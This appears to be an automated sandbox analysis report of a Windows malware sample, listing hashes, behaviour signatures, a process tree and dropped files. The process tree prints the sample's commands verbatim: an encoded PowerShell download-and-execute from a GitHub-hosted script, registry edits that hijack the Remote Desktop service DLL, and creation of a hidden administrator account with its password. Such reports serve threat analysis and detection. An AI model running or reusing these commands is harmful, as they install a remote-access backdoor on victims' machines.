Analysis
-
max time kernel
110s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
05-12-2021 07:50
General
-
Target
f616975d69da372f403d58ba955dc510.exe
-
Size
4.6MB
-
MD5
f616975d69da372f403d58ba955dc510
-
SHA1
e22fcb3ec811cba8d74d4f897d495f21e8c88224
-
SHA256
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
-
SHA512
2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 58 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe"C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA78B.tmp" "c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD77.tmp" "c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc iIAQ5Y1o /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc iIAQ5Y1o /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc iIAQ5Y1o /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc iIAQ5Y1o1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc iIAQ5Y1o2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc iIAQ5Y1o3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESA78B.tmpMD5
5ffc8022f7dca3f3fe9f6404b97885b3
SHA1c900bf19d0cec348e3b03c304fe9b38e09c94b04
SHA25603bd353d66aff99b2e15ffe4c5602561c627a395a4e7cfb43c656f9ef6072e2c
SHA512d4c5db4bbf4c0e143e4eb5b04485a64be31eb43c7144a738829dc52f82ce15e28695eaba2dd013ffbdb2c8c43a78a5792bb74286e8ad4b34c3a4803ed4b5687e
-
C:\Users\Admin\AppData\Local\Temp\RESAD77.tmpMD5
61baf1e29429e277b58293586f4b54d0
SHA1865b60916d313059a67db1b099b4f5676dac9a7f
SHA25656440390b1b06339fc4039148e654d814fdfcdfd5084d0c2494f7810ffd92175
SHA5129c2e58571c5d7c879dcc04cb66255134579b3b8fa028e8a8c8d0bb09cd5d38e66f951498151a2076fea89bf26979e67140dcc637f181642c6874d947d876a9ff
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
906cfa662334c891a46689a3f1da9330
SHA1eeea78f5017291d2bcc9455977849c075077a14a
SHA2565d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
SHA5127d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.dllMD5
8949f891fd5c4bd43ec267d70039e43d
SHA195951fbd24f258f2dce531e98844f1f91ee4dacb
SHA256ebb92517328a31e522cb30152686330f66969d37458ec0a156c5eb2b25e125c3
SHA5122802f5ebf8e51ba562b59f1fdf90f8c203c0f31ea45d1c7da58b251be2fc250f17a583fad2c307dec59dcdcc3c0b035155e0cad5f0111fe629c72df2739de61e
-
C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.dllMD5
962faacb74d4257e90d8affde3134a97
SHA17a2c28bd66672c423a189abc5f2dddc2972d867e
SHA25666c24ab3956f297e9f5ab6295658fe1dc9f5a7d28e15ba505e42a0dd6a626911
SHA51235eb3fd1898aac3f119af5fbb47be5fb600c5adebac3e6eec35fe4e0c3994b63323249cdf25feb412ec7c8cecec65f05d8d257e3b1805721d8ff90791a0029d7
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMPMD5
9fdc502fbdac73694ca152e18e2906cb
SHA1e7033b7c87f39bd7df23419a6061d8a76f30a281
SHA2565d061933f05ee0cd73effbe37956104731147e1484f658b0b4fee673ddc12bd0
SHA51285d8c6d4084617715c523f6ab9b8cc038925490911e8bd9f26a45a996e929bea834fa8e0a8860cb5cbf11b140227cc6922d2793dd45fc3ffa8ab66617db057d5
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdlineMD5
ed93f3a391533a10becf9eb24caf0e30
SHA1e038f5fc24363ab246907a1e329c809fb7e38251
SHA25629e634e47ab6b85fdfd91c9e32555dede9e237932f8cb515516117c14a887fd9
SHA512840470dd197ce50c3e72082af5bf993e265337a415c43685b1f20cd6d424998edb7efa898487f7089294bbcdff36b2989442e67d8f870b0b47a64865f2239109
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMPMD5
4fbfd005c3465e4ca5b9c8fa003cb9c5
SHA131e53773310c41d1e516fd93784f2a40cb435953
SHA2562423d8642f8f1e70fa9ed8af3ec7667ff31f74328e5032b52264d69bb76e70f2
SHA51227a795f4adff9589aa479b81d186f8be3c8b63d65d1cbdfce8851972d859dfda9c5c6b55fa09de01422fb38bf08c85ca4128d0a91b7a53061e2142750d9a8e7c
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdlineMD5
e9e6879a9433c28ea29428f095a98f62
SHA1d1cb8d7735f1f0e0bee30a92b1092b6577b96bfa
SHA256ef05f5e5a88d8909a9327f11f995dc725fe64ec3bfd17571a044c5719ccd0695
SHA512cea57b366d25a6b6de5e7209602b66d29270596aa286389360ece781035c06fad71bd729f08f27246a6183dfd417c73ecf09e0810ff0cf3cc8480ca4a342864e
-
\Windows\Branding\mediasrv.pngMD5
b5a099246bec080e384b19fff56bb2cc
SHA16f26990f3f471717c97dca80a2ccbf2eac952280
SHA256352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA51269dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
-
\Windows\Branding\mediasvc.pngMD5
cc59270baf11196c3414204c319f3be9
SHA1038e2aa526fad8eb762e21e9aed7eab4531d4e11
SHA2565c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
SHA5128e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-
memory/352-331-0x0000000000000000-mapping.dmp
-
memory/400-312-0x0000000000000000-mapping.dmp
-
memory/656-332-0x0000000000000000-mapping.dmp
-
memory/696-334-0x0000000000000000-mapping.dmp
-
memory/708-422-0x0000000000000000-mapping.dmp
-
memory/712-150-0x0000000000000000-mapping.dmp
-
memory/724-273-0x0000000000000000-mapping.dmp
-
memory/1064-143-0x0000000000000000-mapping.dmp
-
memory/1152-421-0x0000000000000000-mapping.dmp
-
memory/1244-322-0x0000000000000000-mapping.dmp
-
memory/1516-153-0x0000000000000000-mapping.dmp
-
memory/1524-224-0x000002022D940000-0x000002022D942000-memory.dmpFilesize
8KB
-
memory/1524-214-0x0000000000000000-mapping.dmp
-
memory/1524-257-0x000002022D946000-0x000002022D948000-memory.dmpFilesize
8KB
-
memory/1524-258-0x000002022D948000-0x000002022D94A000-memory.dmpFilesize
8KB
-
memory/1524-225-0x000002022D943000-0x000002022D945000-memory.dmpFilesize
8KB
-
memory/1532-252-0x0000000000000000-mapping.dmp
-
memory/1800-275-0x0000000000000000-mapping.dmp
-
memory/1924-336-0x0000000000000000-mapping.dmp
-
memory/1940-337-0x0000000000000000-mapping.dmp
-
memory/1976-321-0x0000000000000000-mapping.dmp
-
memory/1996-340-0x0000000000000000-mapping.dmp
-
memory/2064-313-0x0000000000000000-mapping.dmp
-
memory/2084-339-0x0000000000000000-mapping.dmp
-
memory/2180-327-0x0000000000000000-mapping.dmp
-
memory/2188-329-0x0000000000000000-mapping.dmp
-
memory/2212-328-0x0000000000000000-mapping.dmp
-
memory/2256-316-0x0000000000000000-mapping.dmp
-
memory/2420-341-0x0000000000000000-mapping.dmp
-
memory/2420-354-0x000001FBDCA70000-0x000001FBDCA72000-memory.dmpFilesize
8KB
-
memory/2420-355-0x000001FBDCA73000-0x000001FBDCA75000-memory.dmpFilesize
8KB
-
memory/2420-356-0x000001FBDCA76000-0x000001FBDCA78000-memory.dmpFilesize
8KB
-
memory/2420-365-0x000001FBDCA78000-0x000001FBDCA79000-memory.dmpFilesize
4KB
-
memory/2448-317-0x0000000000000000-mapping.dmp
-
memory/2540-333-0x0000000000000000-mapping.dmp
-
memory/2568-140-0x0000000000000000-mapping.dmp
-
memory/3056-319-0x0000000000000000-mapping.dmp
-
memory/3144-338-0x0000000000000000-mapping.dmp
-
memory/3152-326-0x0000000000000000-mapping.dmp
-
memory/3440-173-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-172-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-184-0x000001E86CE86000-0x000001E86CE88000-memory.dmpFilesize
8KB
-
memory/3440-182-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-171-0x0000000000000000-mapping.dmp
-
memory/3440-174-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-181-0x000001E86CE83000-0x000001E86CE85000-memory.dmpFilesize
8KB
-
memory/3440-175-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-180-0x000001E86CE80000-0x000001E86CE82000-memory.dmpFilesize
8KB
-
memory/3440-178-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-177-0x000001E86CE30000-0x000001E86CE32000-memory.dmpFilesize
8KB
-
memory/3440-223-0x000001E86CE88000-0x000001E86CE8A000-memory.dmpFilesize
8KB
-
memory/3460-121-0x000001687F7B3000-0x000001687F7B5000-memory.dmpFilesize
8KB
-
memory/3460-122-0x000001687F7B5000-0x000001687F7B6000-memory.dmpFilesize
4KB
-
memory/3460-123-0x000001687F7B6000-0x000001687F7B7000-memory.dmpFilesize
4KB
-
memory/3460-118-0x0000016838340000-0x000001683860E000-memory.dmpFilesize
2.8MB
-
memory/3460-120-0x000001687F7B0000-0x000001687F7B2000-memory.dmpFilesize
8KB
-
memory/3500-320-0x0000000000000000-mapping.dmp
-
memory/3672-274-0x0000000000000000-mapping.dmp
-
memory/3696-318-0x0000000000000000-mapping.dmp
-
memory/3780-323-0x0000000000000000-mapping.dmp
-
memory/3952-164-0x000001FB57F18000-0x000001FB57F19000-memory.dmpFilesize
4KB
-
memory/3952-157-0x000001FB58040000-0x000001FB58041000-memory.dmpFilesize
4KB
-
memory/3952-128-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-124-0x0000000000000000-mapping.dmp
-
memory/3952-125-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-162-0x000001FB586A0000-0x000001FB586A1000-memory.dmpFilesize
4KB
-
memory/3952-126-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-127-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-129-0x000001FB3FD20000-0x000001FB3FD21000-memory.dmpFilesize
4KB
-
memory/3952-163-0x000001FB58A30000-0x000001FB58A31000-memory.dmpFilesize
4KB
-
memory/3952-130-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-131-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-132-0x000001FB580A0000-0x000001FB580A1000-memory.dmpFilesize
4KB
-
memory/3952-133-0x000001FB57F10000-0x000001FB57F12000-memory.dmpFilesize
8KB
-
memory/3952-134-0x000001FB57F13000-0x000001FB57F15000-memory.dmpFilesize
8KB
-
memory/3952-149-0x000001FB57F16000-0x000001FB57F18000-memory.dmpFilesize
8KB
-
memory/3952-136-0x000001FB3E130000-0x000001FB3E132000-memory.dmpFilesize
8KB
-
memory/3952-147-0x000001FB57EF0000-0x000001FB57EF1000-memory.dmpFilesize
4KB
-
memory/4008-330-0x0000000000000000-mapping.dmp
-
memory/4068-335-0x0000000000000000-mapping.dmp
